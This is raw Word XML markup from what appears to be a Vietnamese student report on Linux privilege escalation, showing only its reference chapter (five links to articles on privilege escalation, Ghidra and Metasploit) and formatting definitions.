          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C65F8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>leo thang đặc quyền trên Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD6E210" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AB5F93" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E4320" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc90050805"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 5: TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="1AE1E95C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="00E27A27">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId166" w:anchor=":~:text=Th%C4%83ng%20h%E1%BA%A1ng%20%C4%91%E1%BA%B7c%20quy%E1%BB%81n%3A%20N%C3%B3,c%C3%B3%20s%E1%BA%B5n%20cho%20ng%C6%B0%E1%BB%9Di%20d%C3%B9ng">
        <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="000000"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://helpex.vn/article/hieu-sau-hon-ve-cac-cuoc-tan-cong-leo-thang-dac-quyen-608ea6512744c49a00465af3#:~:text=Th%C4%83ng%20h%E1%BA%A1ng%20%C4%91%E1%BA%B7c%20quy%E1%BB%81n%3A%20N%C3%B3,c%C3%B3%20s%E1%BA%B5n%20cho%20ng%C6%B0%E1%BB%9Di%20d%C3%B9ng</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C233E1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="00E27A27">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId167">
        <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="000000"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://viblo.asia/p/leo-thang-dac-quyen-trong-linux-linux-privilege-escalation-0-using-sudo-rights-3Q75w8x2KWb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="204D2731" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="00E27A27">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId168">
        <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="000000"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://blog.desdelinux.net/vi/ghidra-un-conjunto-de-herramientas-de-ingenieria-inversa-de-la-nsa/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4AE53E38" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="00E27A27">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId169">
        <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="000000"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://tuhocnetworksecurity.business.blog/2021/01/12/kali-linux-can-ban-bai-3-gioi-thieu-metasploit/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5790C5C1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="00E27A27">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId170">
        <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="000000"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://linuxteamvietnam.us/huong-dan-hoc-metasploit-framework-rat-chi-la-co-ban/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67FF6E07" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="006F1FD5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006F1FD5" w:rsidRPr="00C97D8D">
      <w:footerReference w:type="default" r:id="rId17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6EA6" w14:textId="77777777" w:rsidR="00E27A27" w:rsidRDefault="00E27A27">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="573D96BD" w14:textId="77777777" w:rsidR="00E27A27" w:rsidRDefault="00E27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421E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="22C03150" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">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1FC7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="50C50A08" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">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E751" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing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3CED" w14:textId="0544824E" w:rsidR="006F1FD5" w:rsidRDefault="001F7EFA">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C97D8D">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="75CE22E4" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>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6158" w14:textId="77777777" w:rsidR="00E27A27" w:rsidRDefault="00E27A27">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59567E13" w14:textId="77777777" w:rsidR="00E27A27" w:rsidRDefault="00E27A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E03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDB2F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CD739C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D88E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92290"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FD0E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AA21D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AA60D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7F7F04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2452A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0621F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="013A7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3A2A4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED767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7246CB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="138C5E1A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2487" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3207" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3927" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4647" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5367" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6087" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6807" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7527" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8247" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="188C70EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AE4C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B2E726C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD984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F02D92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6EC84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5BA7D70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBDE693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36708E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F38CA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A5C548B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="431A8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C44004"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24AE7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F645B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9850D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F0C1527"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61D24D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13F7632"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4424A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846AC9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA760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9615C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87960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AA4F07"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DA80410"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>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307CFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84F42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89102A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B52626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3B77378"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="42E0E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FB41B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8B88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343527"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9DB84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1E5020"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F74C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BA3F6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D33E6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7C72A42"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD2C0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F95380"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26CCB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504DE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="642672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BDD7A67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CFA1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437180"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B0E5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6A051AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9F2AC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9900649"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B01C9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40783F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="919A2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85678C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B8AD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5D1A88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00F4F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BA55FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51163A0C"/>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711C68"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8220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C7B5F64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="875C4E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1"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="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FD5"/>
    <w:rsid w:val="000C5645"/>
    <w:rsid w:val="000F1BFE"/>
    <w:rsid w:val="001F7EFA"/>
    <w:rsid w:val="002103A9"/>
    <w:rsid w:val="00391B00"/>
    <w:rsid w:val="003C65F8"/>
    <w:rsid w:val="004D1238"/>
    <w:rsid w:val="00640CC0"/>
    <w:rsid w:val="00652A9E"/>
    <w:rsid w:val="006F1FD5"/>
    <w:rsid w:val="007949BF"/>
    <w:rsid w:val="008A5BA0"/>
    <w:rsid w:val="00B53014"/>
    <w:rsid w:val="00B66CA8"/>
    <w:rsid w:val="00C97D8D"/>
    <w:rsid w:val="00E27A2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4AC6"/>
  <w15:docId w15:val="{04F9DE1F-98EE-432A-B21C-A46EFE6E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37"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00991237"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="42"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00594D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2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91237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="42"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00594D3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D2271"/>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991237"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00991237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00991237"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00991237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
